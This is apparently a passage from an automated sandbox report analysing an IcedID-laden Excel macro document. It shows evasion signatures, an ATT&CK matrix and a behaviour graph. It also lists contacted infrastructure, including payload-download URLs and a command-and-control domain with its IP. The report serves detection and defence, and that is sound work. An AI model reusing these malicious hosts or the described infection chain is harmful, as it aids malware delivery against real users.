        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C2434 rdtsc 4_2_003C2434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 143.204.91.74 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_003C22DC LookupAccountNameW,4_2_003C22DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444731 Sample: Vac.list07-20214862208.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Document exploit detected (drops PE files) 2->37 39 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->39 41 6 other signatures 2->41 6 EXCEL.EXE 53 26 2->6         started        process3 dnsIp4 23 uppercilio.fun 172.67.146.88, 49167, 80 CLOUDFLARENETUS United States 6->23 25 voopeople.fun 172.67.194.117, 49166, 80 CLOUDFLARENETUS United States 6->25 27 thousandsyears.download 172.67.198.51, 49165, 80 CLOUDFLARENETUS United States 6->27 19 C:\Users\user\XTOWN.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+ 6->21 dropped 43 Document exploit detected (creates forbidden files) 6->43 45 Document exploit detected (UrlDownloadToFile) 6->45 11 regsvr32.exe 6->11         started        14 regsvr32.exe 4 6->14         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 47 System process connects to network (likely due to code injection or exploit) 11->47 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->49 51 Tries to detect virtualization through RDTSC time measurements 11->51 29 astrocycle.download 104.21.37.209, 49169, 80 CLOUDFLARENETUS United States 14->29 31 dr49lng3n1n2s.cloudfront.net 143.204.91.74, 443, 49168 AMAZON-02US United States 14->31 33 2 other IPs or domains 14->33 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.buzzsprout.com;0%Avira URL Cloudsafe
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.com0%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com0%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com0%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit0%Avira URL Cloudsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        https://amazonwebservices.d2.sc.omtrdc.net0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.comca1b.crt00%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        https://112-tzm-766.mktoutil.com0%Avira URL Cloudsafe
        http://crl.roo0%Avira URL Cloudsafe
        https://download.stormacq.com/aws/podcast/0%Avira URL Cloudsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
        astrocycle.download0%Avira URL Cloudsafe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Ty0%Avira URL Cloudsafe
        https://chtbl.com0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		172.67.146.88
        		truefalse
          		unknown
          thousandsyears.download
          		172.67.198.51
          		truefalse
            		unknown
            voopeople.fun
            		172.67.194.117
            		truefalse
              		unknown
              astrocycle.download
              		104.21.37.209
              		truetrue
                		unknown
                dr49lng3n1n2s.cloudfront.net
                		143.204.91.74
                		truefalse
                  		high
                  aws.amazon.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://astrocycle.download/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://uppercilio.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://thousandsyears.download/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    astrocycle.downloadtrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.linkedin.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                      		high
                      https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                        		high
                        https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                          		high
                          https://c0.b0.p.awsstatic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                            		high
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://api.regional-table.region-services.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                              		high
                              https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                		high
                                https://aws.amazon.com/ar/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                  		high
                                  https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://a0.p.awsstatic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                    		high
                                    https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                      		high
                                      https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                        		high
                                        https://aws.amazon.com/ru/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.buzzsprout.com;regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                            		high
                                            https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                              		high
                                              https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                		high
                                                https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://p.adsymptotic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://ocsp.sca1b.amazontrust.comregsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://aws.amazon.com/th/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://docs.aws.amazon.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dftu77xade0tc.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://aws.amazon.com/search/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://aws.amazon.com/vi/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://aws.amazon.com/tw/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://d1fgizr415o1r6.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://f0.awsstatic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                          		high
                                                                                          https://spot-bid-advisor.s3.amazonaws.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                              		high
                                                                                              https://d3ctxlq1ktw2nl.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://amazonwebservices.d2.sc.omtrdc.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://d1yyh5dhdgifnx.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://d1hemuljm71t2j.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://ocsp.sca1b.amazontrust.comca1b.crt0regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://view-stage.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://s3.amazonaws.com/public-pricing-agc/regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.%s.comPAregsvr32.exe, 00000004.00000002.2089851397.0000000002CC0000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		low
                                                                                                                          https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://a0.awsstatic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://ssl-static.libsyn.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://website.spot.ec2.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://112-tzm-766.mktoutil.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://static.doubleclick.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://aws.amazon.com/th/?nc1=f_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://investor.msn.comregsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://crl.rooregsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          https://aws.amazon.com/tr/regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://a0.awsstatic.com/g11n-lib/2.0.76regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://s0.awsstatic.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.amazon.jobs/awsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.pngregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://googleads.g.doubleclick.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://s3.amazonaws.com/aws-messaging-pricing-information/regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://download.stormacq.com/aws/podcast/regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.jsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://console.aws.amazon.com/support/home?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svgregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://d2908q01vomqb2.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://dgen8gghn3u86.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://pages.awscloud.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1MEGKE28WTTVJKEVVHZSJX-Content-Tyregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://aws.amazon.com/vi/?nc1=f_lsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://a0.awsstatic.com/aws-blog/1.0.47/jsregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://chtbl.comregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://dk261l6wntthl.cloudfront.netregsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.cssregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://console.aws.amazon.com/billing/home?nc2=h_m_bcregsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high

                                                                                                                                                                                  Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  172.67.198.51
                                                                                                                                                                                  		thousandsyears.downloadUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  143.204.91.74
                                                                                                                                                                                  		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                  104.21.37.209
                                                                                                                                                                                  		astrocycle.downloadUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                                                  172.67.146.88
                                                                                                                                                                                  		uppercilio.funUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  172.67.194.117
                                                                                                                                                                                  		voopeople.funUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                  General Information

                                                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                                                  Analysis ID:444731
                                                                                                                                                                                  Start date:06.07.2021
                                                                                                                                                                                  Start time:16:02:29
                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
